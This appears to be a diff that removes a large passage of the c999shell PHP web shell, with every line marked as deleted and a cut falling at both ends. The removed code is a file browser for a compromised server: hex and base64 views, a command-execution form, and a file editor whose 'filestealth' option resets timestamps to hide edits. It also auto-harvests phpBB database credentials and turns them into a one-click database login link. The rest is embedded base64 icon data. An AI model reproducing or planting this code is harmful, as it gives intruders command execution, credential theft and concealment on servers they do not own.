-   echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";

-  }

-  echo "<hr size=\"1\" noshade>";

-  if ($ft == "info")

-  {

-   echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";

-   if (!$win)

-   {

-    echo "<tr><td><b>Owner/Group</b></td><td> ";    

-    $ow = posix_getpwuid(fileowner($d.$f));

-    $gr = posix_getgrgid(filegroup($d.$f));

-    echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));

-   }

-   echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>";

-   $fi = fopen($d.$f,"rb");

-   if ($fi)

-   {

-    if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));}

-    else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);}

-    $n = 0;

-    $a0 = "00000000<br>";

-    $a1 = "";

-    $a2 = "";

-    for ($i=0; $i<strlen($str); $i++)

-    {

-     $a1 .= sprintf("%02X",ord($str[$i]))." ";

-     switch (ord($str[$i]))

-     {

-      case 0:  $a2 .= "<font>0</font>"; break;

-      case 32:

-      case 10:

-      case 13: $a2 .= "&nbsp;"; break;

-      default: $a2 .= htmlspecialchars($str[$i]);

-     }

-     $n++;

-     if ($n == $hexdump_rows)

-     {

-      $n = 0;

-      if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}

-      $a1 .= "<br>";

-      $a2 .= "<br>";

-     }

-    }

-    //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";}

-    echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>";

-   }

-   $encoded = "";

-   if ($base64 == 1)

-   {

-    echo "<b>Base64 Encode</b><br>";

-    $encoded = base64_encode(file_get_contents($d.$f));

-   }

-   elseif($base64 == 2)

-   {

-    echo "<b>Base64 Encode + Chunk</b><br>";

-    $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));

-   }

-   elseif($base64 == 3)

-   {

-    echo "<b>Base64 Encode + Chunk + Quotes</b><br>";

-    $encoded = base64_encode(file_get_contents($d.$f));

-    $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);

-   }

-   elseif($base64 == 4)

-   {

-    $text = file_get_contents($d.$f);

-    $encoded = base64_decode($text);

-    echo "<b>Base64 Decode";

-    if (base64_encode($encoded) != $text) {echo " (failed)";}

-    echo "</b><br>";

-   }

-   if (!empty($encoded))

-   {

-    echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";

-   }

-   echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>

-<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>

-<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>

-<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>

-<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>

-<P>";

-  }

-  elseif ($ft == "html")

-  {

-   if ($white) {@ob_clean();}

-   echo $r;

-   if ($white) {c999shexit();}

-  }

-  elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";}

-  elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";}

-  elseif ($ft == "phpsess")

-  {

-   echo "<pre>";

-   $v = explode("|",$r);

-   echo $v[0]."<br>";

-   var_dump(unserialize($v[1]));

-   echo "</pre>";

-  }

-  elseif ($ft == "exe")

-  {

-   $ext = explode(".",$f);

-   $c = count($ext)-1;

-   $ext = $ext[$c];

-   $ext = strtolower($ext);

-   $rft = "";

-   foreach($exeftypes as $k=>$v)

-   {

-    if (in_array($ext,$v)) {$rft = $k; break;}

-   }

-   $cmd = str_replace("%f%",$f,$rft);

-   echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>";

-  }

-  elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";}

-  elseif ($ft == "code")

-  {

-   if (ereg("php"."BB 2.(.*) auto-generated config file",$r))

-   {

-    $arr = explode("\n",$r);

-    if (count($arr == 18))

-    {

-     include($d.$f);

-     echo "<b>phpBB configuration is detected in this file!<br>";

-     if ($dbms == "mysql4") {$dbms = "mysql";}

-     if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";}

-     else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c999shell. Please, report us for fix.";}

-     echo "Parameters for manual connect:<br>";

-     $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);

-     foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}

-     echo "</b><hr size=\"1\" noshade>";

-    }

-   }

-   echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">";

-   if (!empty($white)) {@ob_clean();}

-   highlight_file($d.$f);

-   if (!empty($white)) {c999shexit();}

-   echo "</div>";

-  }

-  elseif ($ft == "download")

-  {

-   @ob_clean();

-   header("Content-type: application/octet-stream");

-   header("Content-length: ".filesize($d.$f));

-   header("Content-disposition: attachment; filename=\"".$f."\";");

-   echo $r;

-   exit;

-  }

-  elseif ($ft == "notepad")

-  {

-   @ob_clean();

-   header("Content-type: text/plain");

-   header("Content-disposition: attachment; filename=\"".$f.".txt\";");

-   echo($r);

-   exit;

-  }

-  elseif ($ft == "img")

-  {

-   $inf = getimagesize($d.$f);

-   if (!$white)

-   {

-    if (empty($imgsize)) {$imgsize = 20;}

-    $width = $inf[0]/100*$imgsize;

-    $height = $inf[1]/100*$imgsize;

-    echo "<center><b>Size:</b>&nbsp;";

-    $sizes = array("100","50","20");

-    foreach ($sizes as $v)

-    {

-     echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";

-     if ($imgsize != $v ) {echo $v;}

-     else {echo "<u>".$v."</u>";}

-     echo "</a>&nbsp;&nbsp;&nbsp;";

-    }

-    echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>";

-   }

-   else

-   {

-    @ob_clean();

-    $ext = explode($f,".");

-    $ext = $ext[count($ext)-1];

-    header("Content-type: ".$inf["mime"]);

-    readfile($d.$f);

-    exit;

-   }

-  }

-  elseif ($ft == "edit")

-  {

-   if (!empty($submit))

-   {

-    if ($filestealth) {$stat = stat($d.$f);}

-    $fp = fopen($d.$f,"w");

-    if (!$fp) {echo "<b>Can't write to file!</b>";}

-    else

-    {

-     echo "<b>Saved!</b>";

-     fwrite($fp,$edit_text);

-     fclose($fp);

-     if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}

-     $r = $edit_text;

-    }

-   }

-   $rows = count(explode("\r\n",$r));

-   if ($rows < 10) {$rows = 10;}

-   if ($rows > 30) {$rows = 30;}

-   echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";

-  }

-  elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}

-  else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}

- }

-}

-}

-else

-{

- @ob_clean();

- $images = array(

-"arrow_ltr"=>

-"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ".

-"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==",

-"back"=>

-"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".

-"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt".

-"Wg0JADs=",

-"buffer"=>

-"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo".

-"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD".

-"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==",

-"change"=>

-"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+".

-"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA".

-"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC".

-"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA".

-"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL".

-"zMshADs=",

-"delete"=>

-"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp".

-"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw".

-"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv".

-"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl".

-"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA".

-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5".

-"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4".

-"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G".

-"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ".

-"jwVFHBgiEGQFIgQasYkcSbJQIAA7",

-"download"=>

-"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA".

-"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu".

-"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=",

-"forward"=>

-"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".

-"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt".

-"WqsJADs=",

-"home"=>

-"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA".

-"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS".

-"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j".

-"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=",

-"mode"=>

-"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA".

-"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO".

-"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/".

-"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=",

-"refresh"=>

-"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA".

-"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY".

-"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ".

-"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=",

-"search"=>

-"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//".

-"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap".

-"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD".

-"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr".

-"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==",

-"setup"=>

-"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC".

-"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".

-"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB".

-"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE".

-"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==",

-"small_dir"=>

-"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA".

-"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp".

-"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",

-"small_unk"=>

-"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U".

-"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo".

-"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31".

-"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4".

-"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP".

-"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz".

-"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ".

-"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io".

-"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

-"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz".

-"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM".

-"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC".

-"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj".

-"yAsokBkQADs=",

-"multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR".

-"pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==",

-"sort_asc"=>

-"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa".

-"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==",

-"sort_desc"=>

-"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb".

-"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=",

-"sql_button_drop"=>

-"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".

-"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".

-"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".

-"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".

-"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".

-"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".

-"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".

-"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".

-"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".

-"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".

-"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".

-"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".

-"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA".

-"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/".

-"AQEAOw==",

-"sql_button_empty"=>

-"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".

-"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".

-"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".

-"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".

-"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".

-"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".

-"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".

-"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".

-"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".

-"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".

-"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".

-"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".

-"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA".

-"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==",

-"sql_button_insert"=>

-"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".

-"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".

-"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".

-"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".

-"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".

-"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".

-"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".

-"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".

-"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".

-"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".

-"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".

-"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".

-"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA".

-"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=",

-"up"=>

-"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA".

-"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg".

-"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV".

-"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==",

-"write"=>

-"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA".

-"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze".

-"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61".

-"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==",

-"ext_asp"=>

-"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/".

-"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI".

-"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=",

-"ext_mp3"=>

